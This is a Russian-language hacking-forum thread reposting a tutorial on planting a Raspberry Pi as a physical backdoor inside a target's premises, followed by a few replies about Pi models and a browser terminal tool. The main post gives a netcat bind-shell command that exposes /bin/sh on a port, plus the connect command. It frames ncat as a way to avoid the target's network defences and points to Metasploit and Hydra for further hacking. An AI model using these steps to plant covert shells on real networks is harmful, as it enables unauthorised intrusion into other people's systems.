 |

21.02.2016, 10:14
|
|
Участник форума
Регистрация: 04.03.2015
Сообщений: 129
С нами:
5890890
Репутация:
0
|
|
Данное руководство посвящено одной из техник использования вашего Pi. Небольшой размер делает это устройство идеальным для случаев, когда вам требуется проникнуть на объект. В то же время Raspberry Pi обладает возможностями среднего компьютера. Надеюсь, данное руководство поможет вам раскрыть весь потенциал Raspberry Pi и позволит применить свои навыки на практике. Я планирую сделать из него мини-серию в рамках цикла статей о Raspberry Pi. Итак, давайте загрузим нашу Pi.
Лаборатория злого гения
Я не могу не подчеркнуть, как важно быть готовым к любым препятствиям, возникающим на пути. Посему ваш арсенал должен состоять из: - Kali Linux
- Базовых знаний
- Творческого подхода
Конечно, в данный список можно ещё много чего внести, но эти пункты, по моему мнению, имеют решающее значение.
Ncat
Существуют и другие методы подключения к Raspberry Pi. Вы можете воспользоваться SSH или, если бы хотели получить графический интерфейс, установить VNC сервер, а затем подключиться к нему, получив полный контроль над Kali с графическим интерфейсом. Проблема этих двух методов в том, что они, по всей вероятности, были бы замечены сетевой защитой Корпорации Зла.
Таким образом, ncat остаётся одним из самых эффективных способов подключения к вашему Pi. Но, перед организацией подключения, вам нужно убедиться, что ncat установлен как на самом Pi, так и на компьютере, с которого будет производиться удалённое управление. Полагаю, вы уже установили его на обе системы, так что приступим к подключению. Введите:
Код:
Код:
nc -l -p(порт) -e /bin/sh
Если эта команда выполнится успешно, вы сможете подключиться к Pi со своей Kali Linux… или другой системы, который вы пользуетесь. Суть в том, что вы исполняете простую команду:
Код:
Код:
nc (IP-адрес) (порт)
Если всё прошло удачно, примите мои поздравления. Теперь вы можете навести шороху. Вот некоторые из инструментов, которые могут для этого пригодиться: - [S]link removed[/S]
- Metasploit
- Hydra
Почти все такие инструменты поддерживают Kali Linux. Главное понять, чего вы хотите достичь и не забывать про творческий подход.
Заключение
Теперь, когда у нас есть доступ к Pi, пришла пора заняться взломом. Я не стану рассказывать о каждом из многочисленных инструментов, но ваши возможности практически безграничны. В ближайшем будущем, я планирую написать несколько руководств по взлому с помощью Pi и различных инструментов. Но сейчас я занят работой над несколькими проектами, так что, пожалуйста, запаситесь терпением. Как обычно, жду ваших комментариев и предложений.
Источник http://null-byte.wonderhowto.com/how-to/raspberry-pi-physical-backdoor-part-1-0167625/
|
|
|

12.10.2017, 05:51
|
|
Новичок
Регистрация: 28.12.2016
Сообщений: 0
С нами:
4934532
Репутация:
0
|
|
Помогите вспомнить статью про Распберри, с объяснением как подключиться к нему через браузер. Там использовалась прога с гитхаба толи gotty толи getty. Где ее найти .
Разул глаза и нашел. Всем спосибо помощь больше не требуеться.
|
|
|

18.11.2017, 21:52
|
|
Новичок
Регистрация: 11.11.2017
Сообщений: 0
С нами:
4475359
Репутация:
0
|
|
Sergei webware сказал(а):
Данное руководство посвящено одной из техник использования вашего Pi
Какому именно RPi? Их три версии. А образов для пентестов - по три на каждую из версий.
|
|
|

18.11.2017, 23:03
|
|
Новичок
Регистрация: 28.12.2016
Сообщений: 0
С нами:
4934532
Репутация:
0
|
|
Ой дайте сумничяю три версии. Raspberry Pi Zero W | Raspberry Pi 3 | Raspberry Pi Zero | Raspberry Pi 2 | Raspberry Pi A+ | Raspberry Pi B.
|
|
|
|
 |
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|